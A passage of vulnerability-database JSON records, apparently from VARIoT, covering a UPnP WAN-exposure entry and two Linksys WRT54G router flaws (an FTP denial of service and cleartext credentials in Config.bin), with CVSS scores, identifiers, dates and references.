"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"date": "2011-11-22T00:00:00",
"db": "VULHUB",
"id": "VHN-52446"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:04.887000",
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5058"
},
{
"date": "2013-01-24T00:00:00",
"db": "VULHUB",
"id": "VHN-52446"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003031"
},
{
"date": "2013-01-24T05:00:00",
"db": "NVD",
"id": "CVE-2011-4501"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-363"
}
],
"trust": 0.6
}
}
VAR-200803-0061
Vulnerability from variot - Updated: 2023-12-18 11:53The Linksys WRT54G router allows remote attackers to cause a denial of service (device restart) via a long username and password to the FTP interface. Linksys WRT54G Router is prone to a denial-of-service vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200803-0061",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.8,
"vendor": "cisco linksys",
"version": null
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "85099"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1265"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "85099"
}
],
"trust": 0.3
},
"cve": "CVE-2008-1265",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 6.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.8,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2008-1265",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-31390",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-1265",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200803-143",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-31390",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31390"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Linksys WRT54G router allows remote attackers to cause a denial of service (device restart) via a long username and password to the FTP interface. Linksys WRT54G Router is prone to a denial-of-service vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "BID",
"id": "85099"
},
{
"db": "VULHUB",
"id": "VHN-31390"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1265",
"trust": 2.8
},
{
"db": "XF",
"id": "41127",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200803-143",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20080301 THE ROUTER HACKING CHALLENGE IS OVER!",
"trust": 0.6
},
{
"db": "XF",
"id": "54",
"trust": 0.6
},
{
"db": "BID",
"id": "85099",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-31390",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31390"
},
{
"db": "BID",
"id": "85099"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"id": "VAR-200803-0061",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-31390"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:53:34.750000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31390"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "NVD",
"id": "CVE-2008-1265"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.gnucitizen.org/projects/router-hacking-challenge/"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/489009/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41127"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/41127"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1265"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1265"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31390"
},
{
"db": "BID",
"id": "85099"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-31390"
},
{
"db": "BID",
"id": "85099"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-10T00:00:00",
"db": "VULHUB",
"id": "VHN-31390"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85099"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"date": "2008-03-10T17:44:00",
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"date": "2008-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-31390"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85099"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004206"
},
{
"date": "2018-10-11T20:31:24.857000",
"db": "NVD",
"id": "CVE-2008-1265"
},
{
"date": "2008-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Service disruption in routers (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004206"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-143"
}
],
"trust": 0.6
}
}
VAR-200803-0059
Vulnerability from variot - Updated: 2023-12-18 11:44The Linksys WRT54G router stores passwords and keys in cleartext in the Config.bin file, which might allow remote authenticated users to obtain sensitive information via an HTTP request for the top-level Config.bin URI. Linksys WRT54G Router is prone to a information disclosure vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200803-0059",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.8,
"vendor": "cisco linksys",
"version": null
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "85074"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1263"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "85074"
}
],
"trust": 0.3
},
"cve": "CVE-2008-1263",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2008-1263",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-31388",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-1263",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200803-141",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-31388",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31388"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Linksys WRT54G router stores passwords and keys in cleartext in the Config.bin file, which might allow remote authenticated users to obtain sensitive information via an HTTP request for the top-level Config.bin URI. Linksys WRT54G Router is prone to a information disclosure vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "BID",
"id": "85074"
},
{
"db": "VULHUB",
"id": "VHN-31388"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1263",
"trust": 2.8
},
{
"db": "XF",
"id": "41115",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200803-141",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20080301 THE ROUTER HACKING CHALLENGE IS OVER!",
"trust": 0.6
},
{
"db": "BID",
"id": "85074",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-31388",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31388"
},
{
"db": "BID",
"id": "85074"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"id": "VAR-200803-0059",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-31388"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:44:00.149000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-310",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31388"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "NVD",
"id": "CVE-2008-1263"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.gnucitizen.org/projects/router-hacking-challenge/"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/489009/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41115"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/41115"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1263"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1263"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31388"
},
{
"db": "BID",
"id": "85074"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-31388"
},
{
"db": "BID",
"id": "85074"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-10T00:00:00",
"db": "VULHUB",
"id": "VHN-31388"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85074"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"date": "2008-03-10T17:44:00",
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"date": "2008-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-31388"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85074"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004204"
},
{
"date": "2018-10-11T20:31:24.230000",
"db": "NVD",
"id": "CVE-2008-1263"
},
{
"date": "2008-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Vulnerability to obtain important information in router",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004204"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "encryption problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-141"
}
],
